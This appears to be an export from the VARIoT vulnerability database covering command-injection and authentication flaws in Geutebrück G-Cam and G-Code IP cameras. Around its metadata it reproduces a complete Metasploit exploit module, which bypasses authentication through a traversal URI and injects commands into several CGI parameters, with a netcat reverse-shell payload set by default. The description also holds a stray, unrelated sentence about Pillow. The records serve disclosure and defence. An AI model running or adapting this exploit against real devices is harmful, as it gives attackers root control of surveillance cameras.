v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33551",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.7
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2021090031",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "id": "VAR-202109-0860",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:08:56.110000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Multiple  Geutebr\u00fcck Repair measures for camera device command injection vulnerability",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158066"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.2,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.6,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2021090031"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33551"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-09-13T18:15:23.217000",
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2022-10-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2023-11-07T03:35:52.063000",
            "db": "NVD",
            "id": "CVE-2021-33551"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2086"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0596

    Vulnerability from variot - Updated: 2025-01-30 21:03

    Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/language.cgi'
            }
          ],
          [
            'CVE-2021-33551 - oem.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'set',
                'enable' => 'yes',
                'environment.lang' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/oem.cgi'
            }
          ],
          [
            'CVE-2021-33552 - simple_reclistjs.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'get',
                'timekey' => Rex::Text.rand_text_numeric(2..4),
                'date' => '$(PLACEHOLDER_CMD)'
              },
              'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
            }
          ],
          [
            'CVE-2021-33553 - testcmd.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
              'uri' => '/../uapi-cgi/testcmd.cgi'
            }
          ],
          [
            'CVE-2021-33554 - tmpapp.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/tmpapp.cgi'
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
        },
        'Notes' => {
          'Stability' => ['CRASH_SAFE'],
          'Reliability' => ['REPEATABLE_SESSION'],
          'SideEffects' => ['ARTIFACTS_ON_DISK']
        }
      )
    )
    

    end

    def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end

    unless res&.body && !res.body.empty?
      print_error('Empty body in the response!')
      return false
    end
    
    res_xml = res.get_xml_document
    if res_xml.at('//firmware').nil?
      print_error('Target did not respond with a XML document containing the "firmware" element!')
      return false
    end
    raw_text = res_xml.at('//firmware').text
    if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
      raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
    else
      print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
      false
    end
    

    end

    def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end

    rex_version = Rex::Version.new(version)
    vprint_status("Found Geutebruck version #{rex_version}")
    if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
      return CheckCode::Appears
    end
    
    CheckCode::Safe
    

    end

    def exploit print_status("#{rhost}:#{rport} - Setting up request...")

    method = target['http_method']
    if method == 'GET'
      http_method_vars = 'vars_get'
    else
      http_method_vars = 'vars_post'
    end
    
    http_vars = target['http_vars']
    http_vars.each do |(k, v)|
      if v.include? 'PLACEHOLDER_CMD'
        http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
      end
    end
    
    print_status("Sending CMD injection request to #{rhost}:#{rport}")
    send_request_cgi(
      {
        'method' => method,
        'uri' => target['uri'],
        http_method_vars => http_vars
      }
    )
    print_status('Exploit complete, you should get a shell as the root user!')
    

    end end

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0596",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-code een-2010",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2230",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam efd-2241",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ethc-2249",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code eec-2400",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ewpc-2270",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ewpc-2275",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ebc-2110",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2250",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam efd-2251",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-cam ethc-2240",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.0.27"
          },
          {
            "model": "g-code een-2040",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2112",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.13.2"
          },
          {
            "model": "g-cam ewpc-2271",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ebc-2111",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "g-cam ethc-2239",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "geutebrueck",
            "version": "1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* een-20xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* efd-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ethc-22xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-cam"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* eec-2xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "works with the above firmware  s  e2 series camera models   encoders"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": null
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ebc-21xx"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "\u2025 * g-code"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "( multiple products )"
          },
          {
            "model": "",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "* ewpc-22xx"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-33543",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
